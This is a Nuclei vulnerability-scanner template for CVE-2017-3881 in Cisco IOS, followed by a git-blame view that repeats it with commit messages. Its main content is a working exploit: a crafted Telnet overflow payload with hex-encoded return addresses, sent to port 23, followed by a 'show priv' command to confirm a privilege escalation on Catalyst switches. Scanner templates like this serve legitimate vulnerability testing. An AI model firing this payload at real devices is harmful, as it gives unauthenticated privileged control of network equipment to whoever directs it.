nuclei-templates/cves/2017/CVE-2017-3881.yaml

id: CVE-2017-3881

info:
  name: Cisco IOS 12.2(55)SE11 Remote Code Execution
  author: dwisiswant0
  severity: critical
  reference: |
    - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
  description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
  tags: cve,cve2017,cisco,rce,network

network:
  - inputs:
      - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
        read: 1024
      - data: "show priv"
        read: 1024
    host:
      - "{{Hostname}}:23"
    read-size: 1024
    matchers:
      - type: word
        words:
          - "Current privilege level is"
:fire: Add CVE-2017-3881 Drafting this PoC, since network template is work in progress. 2021-02-23 22:08:10 +00:00			`id: CVE-2017-3881`

			`info:`
			`name: Cisco IOS 12.2(55)SE11 Remote Code Execution`
			`author: dwisiswant0`
			`severity: critical`
Update CVE-2017-3881.yaml 2021-03-11 15:24:59 +00:00			`reference: \|`
			`- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/`
			`- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md`
Restruct [lint] 2021-03-11 15:48:48 +00:00			`description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.`
			`tags: cve,cve2017,cisco,rce,network`
:fire: Add CVE-2017-3881 Drafting this PoC, since network template is work in progress. 2021-02-23 22:08:10 +00:00
			`network:`
			`- inputs:`
			`- data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"`
			`read: 1024`
			`- data: "show priv"`
			`read: 1024`
			`host:`
:hammer: Move port inside host 2021-03-10 07:31:17 +00:00			`- "{{Hostname}}:23"`
:fire: Add CVE-2017-3881 Drafting this PoC, since network template is work in progress. 2021-02-23 22:08:10 +00:00			`read-size: 1024`
			`matchers:`
			`- type: word`
			`words:`
			`- "Current privilege level is"`